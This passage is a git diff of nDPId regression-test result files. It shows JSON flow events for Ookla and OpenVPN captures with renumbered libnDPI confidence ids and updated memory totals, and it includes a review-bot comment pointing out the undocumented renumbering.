{"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI 
(cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"}} 
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","packets-captured":5086,"packets-processed":5086,"total-skipped-flows":0,"total-l4-payload-len":4349113,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1491069155251} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5086/5086 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6028269 bytes -~~ total memory freed........: 6028269 bytes -~~ total allocations/frees...: 123208/123208 +~~ total memory allocated....: 6161903 bytes +~~ total memory freed........: 6161903 bytes +~~ total allocations/frees...: 125970/125970 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 695 chars diff --git a/test/results/openvpn.pcap.out b/test/results/openvpn.pcap.out index 014cf83b3..6a75f7cf9 100644 --- a/test/results/openvpn.pcap.out +++ b/test/results/openvpn.pcap.out 
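Review bot: The numeric key inside `ndpi.confidence` is not stable across this libnDPI bump: in this hunk `"4":"DPI"` becomes `"6":"DPI"` and `"3":"DPI (cache)"` becomes `"5":"DPI (cache)"` while the labels stay the same, and the commit message does not mention it. Any collector or detection rule that matches on the number rather than the label would misread confidence after the update without raising an error, so the description should carry a line such as `confidence ids renumbered by libnDPI (DPI 4 -> 6, DPI (cache) 3 -> 5); consumers should match on the label`. The same renumbering shows in the openvpn.pcap.out and os_detected.pcapng.out hunks. Separately, the `end` event for flow 1 here now reports `"flow_state":"finished"` with an `ndpi` object where the old line reported `"info"` with none, which looks like a behaviour change worth its own line in the description.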
@@ -4,22 +4,22 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467904946700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946700,"pkt":"hCYVLjtSAA6OGXEMCABFAAA8ANVAAEAGYbLAqAFNLmXn2ursAbu+lXueAAAAAKACchBbjAAAAgQFtAQCCAoADXtLAAAAAAEDAwE="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1467904946755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946755,"pkt":"AA6OGXEMhCYVLjtSCABFoAA8AABAADQGbecuZefawKgBTQG76uxsxVWWvpV7n6AScSBx2QAAAgQFtAQCCAoANCgCAA17SwEDAwE="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1467904946755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467904946755,"pkt":"hCYVLjtSAA6OGXEMCABFAAA0ANZAAEAGYbnAqAFNLmXn2ursAbu+lXufbMVVl4AQOQjYsgAAAQEICgANe1AANCgC"} 
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 
00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":96,"packets-processed":95,"total-skipped-flows":0,"total-l4-payload-len":9094,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1470218591746} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470218591746,"flow_last_seen":1470218591746,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470218591746,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1470218591746,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1470218591746,"pkt":"mAyC0zx8AAjKQoXqCABFAABG3rhAAEARTXXAqCsMizuXiaIjNXAAMosJOLAsz\/G18BdPwJFmbjsSS62jkXMxe5OXItH+Y74AAAABV6HBXwAAAAAA"} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1470218591941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1470218591941,"pkt":"AAjKQoXqmAyC0zx8CABFAABSYIhAADIR2ZmLO5eJwKgrDDVwoiMAPhWBQPd\/wu\/b4j9X3sTI1WVNByO\/jAvlQThWMnDPrhMAAAABV6HBXwEAAAAAsCzP8bXwF08AAAAA"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470218591746,"flow_last_seen":1470218591941,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470218591941,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470218591746,"flow_last_seen":1470218591941,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470218591941,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470218591942,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470218591942,"pkt":"mAyC0zx8AAjKQoXqCABFAABO3uZAAEARTT\/AqCsMizuXiaIjNXAAOpZEKLAsz\/G18BdPyDdJemqNaU65YLasCHjnV9mH+DAAAAACV6HBXwEAAAAA93\/C79viP1c="} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1470218600860,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 
+00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1470218600860,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":179,"packets-processed":178,"total-skipped-flows":0,"total-l4-payload-len":19167,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1472334890224} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472334890224,"flow_last_seen":1472334890224,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1472334890224,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1472334890224,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1472334890224,"pkt":"mAyC0zx8MFLLbJwbCABFAABGe8pAAEARsF3AqCsSizuXiTVwNXAAMg7DOGYO4pqkkLBZfF5v2e87DGOeGNd7GPORrKCUl+wAAAABV8IMKgAAAAAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1472334892420,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1472334892420,"pkt":"mAyC0zx8MFLLbJwbCABFAABGfNNAAEARr1TAqCsSizuXiTVwNXAAMg7DOGYO4pqkkLBZptsOrY2Z8Me\/lrzRmp5vsU3x26QAAAACV8IMKgAAAAAA"} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1472334892467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1472334892467,"pkt":"MFLLbJwbmAyC0zx8CABFAABSgmRAADERuLeLO5eJwKgrEjVwNXAAPoh1QDWQheTdAi5E5ZNzw1yvtD56Ix7qRbnOSoCURYgAAAABV8IMLQEAAAAAZg7imqSQsFkAAAAA"} 
-00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1472334890224,"flow_last_seen":1472334892467,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1472334892467,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":248,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1470218591746,"flow_last_seen":1470218600860,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1172,"flow_tot_l4_payload_len":10073,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1472334896789,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 
-00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1472334890224,"flow_last_seen":1472334909465,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1245,"flow_tot_l4_payload_len":23132,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1472334909465,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1472334890224,"flow_last_seen":1472334892467,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1472334892467,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":248,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1470218591746,"flow_last_seen":1470218600860,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1172,"flow_tot_l4_payload_len":10073,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1472334896789,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1472334890224,"flow_last_seen":1472334909465,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1245,"flow_tot_l4_payload_len":23132,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1472334909465,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":298,"packets-processed":298,"total-skipped-flows":0,"total-l4-payload-len":42299,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1472334909465} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 298/298 @@ -29,9 +29,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882275 bytes -~~ total memory freed........: 5882275 bytes -~~ total allocations/frees...: 118422/118422 +~~ total memory allocated....: 6015909 bytes +~~ total memory freed........: 6015909 bytes +~~ total allocations/frees...: 121184/121184 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 826 chars diff --git a/test/results/oracle12.pcapng.out b/test/results/oracle12.pcapng.out index 202cbc7bc..0284cf60b 100644 --- a/test/results/oracle12.pcapng.out +++ b/test/results/oracle12.pcapng.out @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872071 bytes -~~ total memory freed........: 5872071 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6005705 bytes +~~ total memory freed........: 6005705 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 658 chars 
diff --git a/test/results/os_detected.pcapng.out b/test/results/os_detected.pcapng.out index 38fb5ee77..1e74b5b9d 100644 --- a/test/results/os_detected.pcapng.out +++ b/test/results/os_detected.pcapng.out 
@@ -2,8 +2,8 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1611427514609} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1611427514609,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1611427514609,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAZdFAAEAR\/ePAqAGACAgICJuNAbsE7AYLxP8AAB0Inw\/JO07eNjIIgxX\/XKNBIUIARMqZ8UiDvq\/ZLsUdz0scSMu9YDA5XC\/EJ\/VWdcKmIJjpSLXMxg05sWM0HmWuizvek0EXnlQzmUN9ovr2\/hk4L4+drmSHxo9NOB+GUfgxVDY8jS5sYut7pzwyS1v0Tzd0E1TyJIWDsBfvZlI4bbIIRlefQgOB0WdUqMEfHzxzcbGs6dNO+9vDaznNJ4dGUWqyjTrP1xrbA5ARI5dTVb4R+7D0v8orWpuNvxjoiVb36LCsfL0SbVo2GhqQoHke+Z\/B2D+0+r7INWQc1iHzAG+HeNlA1LtOtYyHAJVB+P59vqKsfmDTE8RgVpXe1x30lS+4YR7jaekw9qCyZHC0kKXvmsPCqZ\/9qa5gMMsfGTjnOTdcid5WA6CyHhSK2HTQW4GkzXHYPreaFIFRc0y9+aMq1Mfl97S1vnvDvIbG91Np67AM6LV1xuilkclYvUim1l1JoFQCUfe6m3PyP+gIQTFerpfrZHjXHVmed8ZubnloXre0\/Z3B2Oh1fmjBjrSNQGdC4YK\/DVld8Ug+FRG0kxgDMCgRJ2S9dOYEMkKgzq\/BKvgwUYmMidXS+F+tMJvoHQSzv3bhpGgehHuZOqNIC3d6Rty6h0nPb+BYsf5E1IpIcwzMB2CvZbT77jViKMoAt5RtufWUmoQ2qymcAa7AXbvCL5L7qI\/1oplTPNm0Ysi0JSUXXf61rlCNL1vc+XNbLSeTg2Vz2fPTbPH7hg\/8qinCri68WhuYiT\/rvuXkVqGxWKJq5b1oM\/AIky7+yMfObOfk9kQ3thgac0pRO1LAAwjECH\/XdGHuEsxIejknnknLjBpjmS+2c+909N0TGc\/NPsDPdaLmN10HnCVLaT1WmruOxWZDa3gV1s3K4IKU6NwqVeHNSYO5xx5HEC7tZU+y4E74cmfLayIxxbdgkahHRv9ATyXrtMLRAHqK8ZsoIIw0D9NAPBA355APW3UhJ\/Z9ZHxppKcR2\/OPN1KQqoIrhRGT9bUzB7Xkn\/VMWRYSTXTiaAYMcb8dRkENbKtVWSIk9LJFrE8pIXivmB2tWlt1t6y+TR30oU1\/NUX3jGhxE7t44s+NhGXfBpl2YQbF4zUhYeZAUzU9QbWzyGdZYarMNxVUgYeW